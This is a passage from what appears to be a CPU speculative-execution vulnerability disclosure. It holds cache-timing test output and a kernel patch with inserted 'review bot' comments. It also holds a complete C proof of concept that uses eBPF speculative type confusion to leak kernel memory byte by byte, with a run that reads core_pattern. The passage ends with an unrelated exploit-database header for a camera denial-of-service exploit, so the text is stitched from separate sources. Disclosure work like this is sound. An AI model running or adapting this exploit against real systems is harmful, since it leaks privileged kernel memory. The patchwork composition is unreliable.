#endif
  for (int idx = 0; idx < 16; idx++) {
#ifdef NO_INTERRUPTS
    asm volatile("cli");
#endif
    pipeline_flush();
    long cycles = 0;
    int hits = 0;
    char results[33] = {0};
    /* if we don't break the loop after some time when it doesn't
     * work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock
     * up */
    while (hits < 32 && cycles < 1000000) {
      pipeline_flush();
      int res = testfun(idx);
      if (res != -1) {
        pipeline_flush();
        results[hits] = res + '0';
        hits++;
      }
      cycles++;
      pipeline_flush();
    }
    pipeline_flush();
#ifdef NO_INTERRUPTS
    asm volatile("sti");
#endif
    out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n",
                    secret_read_area[idx], results, cycles, 100*hits/(double)cycles);
  }
  printf("%s", out);
  pipeline_flush();
}
----------------------- END -----------------------
Results:
In the following, "SMP off" means that I have executed this
command:
# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done
For the Intel machines, "turbo off" means that I've executed the
following command:
# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
Skylake laptop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)
0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)
0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)
0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)
0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)
1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)
1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)
0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)
1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)
1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)
1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)
0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)
1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)
0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)
1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)
1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)
Skylake laptop, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)
0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)
0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)
1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)
1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)
1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
Haswell PC, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)
0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)
0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)
0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)
0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)
1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)
1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)
0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)
1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)
1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)
1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)
0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)
1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)
0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)
1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)
1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)
Haswell PC, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)
0: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
AMD desktop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99
$ ./test
0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)
0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)
0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)
0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)
0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)
1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)
1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)
0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)
1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)
1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)
1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)
0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)
1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)
0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)
1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)
1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)
AMD desktop, SMP off, interrupts off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS
$ sudo ./test
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
======== assisted BPF PoC ========
This is a PoC that demonstrates that this issue can potentially be
used to attack the Linux kernel's BPF subsystem.
This is *NOT* a full exploit against BPF; this is a PoC that requires
kernel patches that permit the PoC to flush kernel memory from inside
BPF and to measure access times to BPF arrays. It seems probable that
these restrictions could be overcome, but my PoC doesn't do that.
The basic idea here is to cause a speculative type confusion:
1. Store a number N at address A on the stack.
2. Write a pointer P to address A, using a high-latency
expression to compute A.
3. Read a value X from address A, with A specified using a low-latency
expression. Architecturally, X is P; however, microarchitecturally,
X can be N.
4. Use the Spectre/Meltdown gadget to leak the value X points to into
the cache.
The attack benefits from the unique property of eBPF that the engine
performs relatively complicated value tracking, but does not
normally use the resulting information to modify the code in any way
(e.g. by optimizing things away). It is not clear how applicable this
attack would be to e.g. other scripting languages, or whether it is an
issue for non-scripting code.
I have only tested this PoC on an Intel Skylake CPU.
Kernel patch required for the PoC to work (copy attached, so that it
applies cleanly), to be applied to the 4.15.1 stable kernel:
----------------------- START -----------------------
diff --git a/include/linux/bpf.h b/include/linux/bpf.h
index 0b25cf87b6d6..896b4f483fe2 100644
--- a/include/linux/bpf.h
+++ b/include/linux/bpf.h
@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;
extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;
extern const struct bpf_func_proto bpf_get_stackid_proto;
extern const struct bpf_func_proto bpf_sock_map_update_proto;
+extern const struct bpf_func_proto bpf_clflush_mfence_proto;
/* Shared helpers among cBPF and eBPF. */
void bpf_user_rnd_init_once(void);
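Review bot: the new `bpf_clflush_mfence_proto` declaration sits among the production helper protos with nothing marking it as test-only, and its only consumer is the literal `case 4:` added in net/core/filter.c rather than a `BPF_FUNC_*` id. A one-line comment on the declaration saying it exists solely for this PoC and must not ship would stop it being mistaken for a real helper.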
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
index 3d24e238221e..379dc888cb81 100644
--- a/kernel/bpf/helpers.c
+++ b/kernel/bpf/helpers.c
@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {
.arg1_type = ARG_PTR_TO_UNINIT_MEM,
.arg2_type = ARG_CONST_SIZE,
};
+
+BPF_CALL_1(bpf_clflush_mfence, void *, target) {
+ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory");
+ return 0;
+}
+
+const struct bpf_func_proto bpf_clflush_mfence_proto = {
+ .func = bpf_clflush_mfence,
+ .ret_type = RET_INTEGER,
+ /* theoretically permits CLFLUSH on invalid addresses,
+ * but the PoC doesn't do that
+ */
+ .arg1_type = ARG_DONTCARE
+};
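Review bot: `.arg1_type = ARG_DONTCARE` lets any 64-bit value reach `clflush`, as the comment in the hunk admits; a CLFLUSH on an unmapped or non-canonical address faults in kernel context, so an unprivileged program that reaches this helper can crash the machine. If the PoC only ever flushes map values, `ARG_PTR_TO_MAP_VALUE` would keep the verifier's bounds guarantee at no cost. The `mfence` on both sides of the flush is right for the timing use, since `clflush` is otherwise weakly ordered.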
diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
index 5cb783fc8224..2dd9a2a95630 100644
--- a/kernel/bpf/syscall.c
+++ b/kernel/bpf/syscall.c
@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)
return err;
}
+static int map_time_flush_loc(union bpf_attr *attr)
+{
+ void __user *ukey = u64_to_user_ptr(attr->key);
+ void __user *uvalue = u64_to_user_ptr(attr->value);
+ int ufd = attr->map_fd;
+ struct bpf_map *map;
+ void *key, *ptr;
+ struct fd f;
+ int err = 0;
+ u64 delay = 0;
+
+ f = fdget(ufd);
+ map = __bpf_map_get(f);
+ if (IS_ERR(map))
+ return PTR_ERR(map);
+
+ if (!(f.file->f_mode & FMODE_CAN_READ)) {
+ err = -EPERM;
+ goto err_put;
+ }
+
+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {
+ err = -EINVAL;
+ goto err_put;
+ }
+
+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {
+ err = -EINVAL;
+ goto err_put;
+ }
+ asm volatile("lfence");
+
+ key = memdup_user(ukey, map->key_size);
+ if (IS_ERR(key)) {
+ err = PTR_ERR(key);
+ goto err_put;
+ }
+
+ rcu_read_lock();
+ ptr = map->ops->map_lookup_elem(map, key);
+ if (ptr) {
+ unsigned int t1, t2;
+ ptr = (char*)ptr + attr->flags;
+ asm volatile(
+ "xor %%r11, %%r11\n\t"
+ "lfence\n\t"
+ "rdtscp\n\t"
+ "mov %%eax, %%ebx\n\t"
+ "mov (%%rdi), %%r11b\n\t"
+ "rdtscp\n\t"
+ "mfence\n\t"
+ "clflush (%%rdi)\n\t"
+ "mfence\n\t"
+ ://out
+ "=a"(t2),
+ "=b"(t1)
+ ://in
+ "D"(ptr)
+ ://clobber
+ "r11",
+ "rcx",
+ "rdx",
+ "memory"
+ );
+ delay = t2 - t1;
+ }
+ rcu_read_unlock();
+ if (copy_to_user(uvalue, &delay, 8)) {
+ err = -EINVAL;
+ goto free_key;
+ }
+
+free_key:
+ kfree(key);
+err_put:
+ fdput(f);
+ return err;
+}
+
#define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags
static int map_update_elem(union bpf_attr *attr)
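Review bot: `map_time_flush_loc()` never calls `CHECK_ATTR()` the way the neighbouring map commands do (the `BPF_MAP_UPDATE_ELEM_LAST_FIELD` define right after the new function shows the convention), so unrecognised attr fields are silently accepted. Two smaller points: `copy_to_user()` failing returns `-EINVAL` where `-EFAULT` is the convention, and when `map_lookup_elem` returns NULL the call still succeeds with `delay == 0`, which the caller cannot tell apart from a genuine zero timing. The range check on `flags` followed by `lfence` before `flags` is used as an offset into the value is the right shape for a bounds-check-bypass guard.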
@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr
__user *, uattr, unsigned int, siz
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
break;
+ case 0x13370001:
+ err = map_time_flush_loc(&attr);
+ break;
case BPF_MAP_DELETE_ELEM:
err = map_delete_elem(&attr);
break;
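Review bot: `0x13370001` is a magic command number dropped into the `bpf()` switch with no `enum bpf_cmd` entry and no last-field define for attr validation, while every other case in the visible context uses a named `BPF_MAP_*` constant. For a PoC that is acceptable, but a comment on the case label saying it is a test hook would keep it from being wired into uapi by accident.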
diff --git a/net/core/filter.c b/net/core/filter.c
index 1c0eb436671f..e310a345054c 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)
return &bpf_tail_call_proto;
case BPF_FUNC_ktime_get_ns:
return &bpf_ktime_get_ns_proto;
+ case 4:
+ return &bpf_clflush_mfence_proto;
case BPF_FUNC_trace_printk:
if (capable(CAP_SYS_ADMIN))
return bpf_get_trace_printk_proto();
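Review bot: `case 4:` uses a bare integer in the `bpf_base_func_proto()` switch, so it silently reuses whatever helper id 4 already denotes in the uapi `BPF_FUNC_*` enumeration instead of allocating a new one; every other case here is a named constant. This placement also exposes the flush helper to unprivileged socket filters, since the `capable(CAP_SYS_ADMIN)` gate in the context applies only to `trace_printk`; that is what the PoC needs, but it should be stated next to the case.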
----------------------- END -----------------------
The PoC:
----------------------- START -----------------------
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <assert.h>
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/user.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {
uint64_t time;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&idx,
.value = (uint64_t)&time,
.flags = off,
};
int res = bpf_(0x13370001, &attr);
if (res)
err(1, "map flush loc");
return time;
}
void array_set_dw(int mapfd, uint32_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
//printf("==========================\n%s==========================\n", verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int input_map, leak_map;
int sockfds[16];
int leak_bit(unsigned long addr, int bit) {
array_set_dw(input_map, 0, addr);
int count_0 = 0, count_1 = 0;
while (count_0 + count_1 < 100) {
array_time_flush_loc(leak_map, 0, 2048+0x1000);
trigger_proc(sockfds[bit+8]);
unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);
array_time_flush_loc(leak_map, 0, 2048);
trigger_proc(sockfds[bit+0]);
unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);
//printf("%u %u\n", t0, t1);
if (t0 < 50)
count_0++;
if (t1 < 50)
count_1++;
}
printf("%d vs %d\n", count_0, count_1);
return (count_0 > count_1) ? 0 : 1;
}
int leak_byte(unsigned long addr) {
int byte = 0;
for (int bit=0; bit<8; bit++) {
byte |= leak_bit(addr, bit)<<bit;
}
return byte;
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
input_map = array_create(8, 1);
leak_map = array_create(0x3000, 1);
if (argc != 3)
errx(1, "invocation (expects addr and length)");
#define BPF_REG_CONFUSED_SLOT BPF_REG_6
#define BPF_REG_SLOW_SLOT BPF_REG_7
#define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8
#define BPF_REG_LEAK_ARRAY BPF_REG_9
#define BPF_REG_CONFUSED BPF_REG_1
#define BPF_REG_SECRET_VALUE BPF_REG_2
#define BPF_REG_DUMMY_SLOT BPF_REG_3
for (int i=0; i<16; i++) {
bool dummy_ff = (i >= 8);
int selected_bit = i & 7;
struct bpf_insn insns[] = {
/* setup: write 0x00 or 0xff to -216 to get a big stack
allocation and to prepare dummy */
BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),
/* setup: compute stack slot pointers to :
* - type-confused stack slot (at -72)
* - pointer to type-confused stack slot (at -144)
*/
BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),
BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),
//BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),
//BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),
/* write to dummy slot (to make a big stack and to permit later read) */
//BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),
/* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */
BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),
/* setup: spill pointer to type-confused stack slot */
BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),
/* setup: load pointer to leak area into register */
BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */
BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),
/* CHEATED: fence and flush */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),
BPF_EMIT_CALL(4/*clflush_mfence*/),
BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),
/* START CRITICAL PATH */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),
BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),
/* 0 or 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),
/* 0 or 0x1000 */
BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),
BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),
/* END CRITICAL PATH */
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));
puts("BPF PROG LOADED SUCCESSFULLY");
}
/*
puts("testing flushed...\n");
for (int i=-1; i<10; i++) {
unsigned int res = array_time_flush_loc(leak_map, 0, 2048);
if (i >= 0)
printf(" %u\n", res);
}
*/
unsigned long base_addr = strtoull(argv[1], NULL, 16);
for (int i=0; i<atoi(argv[2]); i++) {
unsigned long addr = base_addr + i;
unsigned char leaked = leak_byte(addr);
printf("%016lx: 0x%02hhx ('%c')\n", addr, leaked, leaked);
}
return 0;
}
*/
----------------------- END -----------------------
PoC usage:
$ sudo grep core_pattern /proc/kallsyms
ffffffff9b2954e0 D core_pattern
$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c
$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
4 vs 96
1 vs 99
100 vs 0
100 vs 0
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e0: 0x63 ('c')
2 vs 98
1 vs 99
1 vs 99
1 vs 99
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e1: 0x6f ('o')
100 vs 0
3 vs 97
100 vs 0
100 vs 0
1 vs 99
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e2: 0x72 ('r')
2 vs 98
100 vs 0
0 vs 100
100 vs 0
100 vs 0
0 vs 100
0 vs 100
100 vs 0
ffffffff9b2954e3: 0x65 ('e')
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
ffffffff9b2954e4: 0x00 ('')
real 0m31.591s
user 0m2.547s
sys 0m27.429s
*/
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
